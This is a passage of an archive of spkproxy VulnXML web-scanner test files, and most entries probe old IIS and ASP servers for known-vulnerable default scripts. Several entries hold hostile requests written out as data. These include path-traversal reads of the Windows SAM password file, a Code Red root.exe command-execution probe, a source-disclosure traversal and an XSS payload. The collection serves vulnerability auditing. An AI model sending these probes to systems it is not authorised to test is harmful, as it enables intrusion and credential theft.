HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ perl script 200 perl script 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1411.xml0100664000076500007650000000705607566204543017643 0ustar davedave (postinfo.asp) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/postinfo.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1412.xml0100664000076500007650000000722207566204543017637 0ustar davedave (repost.asp) "This allows uploads to /users. Create /users and give web user read only access." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/repost.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Here is your upload status 200 Here is your upload status 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1413.xml0100664000076500007650000000715007566204543017640 0ustar davedave (root.exe?/c+dir+c:\+/OG) "This machine is infected with Code Red 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/root.exe?/c+dir+c:\+/OG HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Directory of C 200 Directory of C 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1414.xml0100664000076500007650000000707607566204543017650 0ustar davedave (samples/ctguestb.idc) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/samples/ctguestb.idc HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1415.xml0100664000076500007650000000707607566204543017651 0ustar davedave (samples/details.idc) "See RFP 9901; www.wiretrip.net" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/samples/details.idc HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1416.xml0100664000076500007650000000711207566204543017641 0ustar davedave (samples/search/webhits.exe) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/samples/search/webhits.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1417.xml0100664000076500007650000000707107566204543017646 0ustar davedave (tools/getdrvrs.exe) "This can be used to make DSNs 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/tools/getdrvrs.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1418.xml0100664000076500007650000000706507566204543017652 0ustar davedave (tools/newdsn.exe) "This can be used to make DSNs 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/tools/newdsn.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1419.xml0100664000076500007650000000723107566204543017646 0ustar davedave (Carello.dll) "Carello 1.3 may allow commands to be executed on the server by replacing hidden form elements. This could not be tested by Nikto." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/Carello/Carello.dll HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-141.xml0100664000076500007650000000732007566204543017554 0ustar davedave (..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam) "BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1420.xml0100664000076500007650000000712007566204543017633 0ustar davedave (bdir.htr) "This default script shows host info and may allow file browsing 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/iisadmin/bdir.htr HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1421.xml0100664000076500007650000000732007566204543017636 0ustar davedave (author.idq) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/samples/search/author.idq HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ The template file can not be found in the location specified 200 The template file can not be found in the location specified 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1422.xml0100664000076500007650000000732407566204543017643 0ustar davedave (filesize.idq) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/samples/search/filesize.idq HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ The template file can not be found in the location specified 200 The template file can not be found in the location specified 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1423.xml0100664000076500007650000000732407566204543017644 0ustar davedave (filetime.idq) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/samples/search/filetime.idq HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ The template file can not be found in the location specified 200 The template file can not be found in the location specified 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1424.xml0100664000076500007650000000732407566204543017645 0ustar davedave (queryhit.idq) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/samples/search/queryhit.idq HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ The template file can not be found in the location specified 200 The template file can not be found in the location specified 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1425.xml0100664000076500007650000000732007566204543017642 0ustar davedave (simple.idq) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/samples/search/simple.idq HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ The template file can not be found in the location specified 200 The template file can not be found in the location specified 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1426.xml0100664000076500007650000000712007566204543017641 0ustar davedave (ctss.idc) "This CGI allows remote users to view and modify SQL DB contents." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/tools/ctss.idc HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1427.xml0100664000076500007650000000711007566204543017641 0ustar davedave (dsnform) "An oldie but goodie... allows creation of ODBC Data Source" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/tools/dsnform HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1428.xml0100664000076500007650000000712007566204543017643 0ustar davedave (dsnform.exe) "An oldie but goodie... allows creation of ODBC Data Source" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/tools/dsnform.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1429.xml0100664000076500007650000000715407566204543017653 0ustar davedave (SQLQHit.asp) "This sample ASP allows anyone to retrieve directory listings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /search/SQLQHit.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ CHARACTERIZATION 200 CHARACTERIZATION 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-142.xml0100664000076500007650000000732407566204543017561 0ustar davedave (..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._) "BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1430.xml0100664000076500007650000000715407566204543017643 0ustar davedave (sqlqhit.asp) "This sample ASP allows anyone to retrieve directory listings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /search/sqlqhit.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ CHARACTERIZATION 200 CHARACTERIZATION 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1431.xml0100664000076500007650000000716007566204543017641 0ustar davedave (SQLQHit.asp) "This sample ASP allows anyone to retrieve directory listings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /search/htx/SQLQHit.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ CHARACTERIZATION 200 CHARACTERIZATION 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1432.xml0100664000076500007650000000716007566204543017642 0ustar davedave (sqlqhit.asp) "This sample ASP allows anyone to retrieve directory listings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /search/htx/sqlqhit.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ CHARACTERIZATION 200 CHARACTERIZATION 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1433.xml0100664000076500007650000000744307566204543017647 0ustar davedave (com.newatlanta.servletexec.JSP10Servlet/) "ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS discloses the web root. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/com.newatlanta.servletexec.JSP10Servlet/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ The file was not found 200 The file was not found 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1434.xml0100664000076500007650000000750507566204543017647 0ustar davedave (com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa) "ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS can reveal source code. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ OBJECT RUNAT=Server 200 OBJECT RUNAT=Server 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1435.xml0100664000076500007650000000717507566204543017653 0ustar davedave (ViewCode.asp) "The default ViewCode.asp can allow an attacker to read any file on the machine." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Sites/Knowledge/Membership/Inspired/ViewCode.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1436.xml0100664000076500007650000000720507566204543017646 0ustar davedave (ViewCode.asp) "The default ViewCode.asp can allow an attacker to read any file on the machine." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1437.xml0100664000076500007650000000720507566204543017647 0ustar davedave (ViewCode.asp) "The default ViewCode.asp can allow an attacker to read any file on the machine." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1438.xml0100664000076500007650000000721507566204543017651 0ustar davedave (ViewCode.asp) "The default ViewCode.asp can allow an attacker to read any file on the machine." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1439.xml0100664000076500007650000000716607566204543017657 0ustar davedave (ViewCode.asp) "The default ViewCode.asp can allow an attacker to read any file on the machine." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Sites/Samples/Knowledge/Push/ViewCode.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-143.xml0100664000076500007650000000736507566204543017567 0ustar davedave (<script>alert('Vulnerable')</script>) "Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1440.xml0100664000076500007650000000717007566204543017642 0ustar davedave (ViewCode.asp) "The default ViewCode.asp can allow an attacker to read any file on the machine." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Sites/Samples/Knowledge/Search/ViewCode.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1441.xml0100664000076500007650000000712107566204543017637 0ustar davedave (findvserver.asp) "Gives a list of installed Site Server components" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SiteServer/admin/findvserver.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1442.xml0100664000076500007650000000714307566204543017644 0ustar davedave (domain.asp) "Displays known domains of which that server is involved." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SiteServer/Admin/commerce/foundation/domain.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1443.xml0100664000076500007650000000712507566204543017645 0ustar davedave (driver.asp) "Displays a list of installed ODBC drivers." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SiteServer/Admin/commerce/foundation/driver.asp HTTP/1.0 The HTTP Response Code 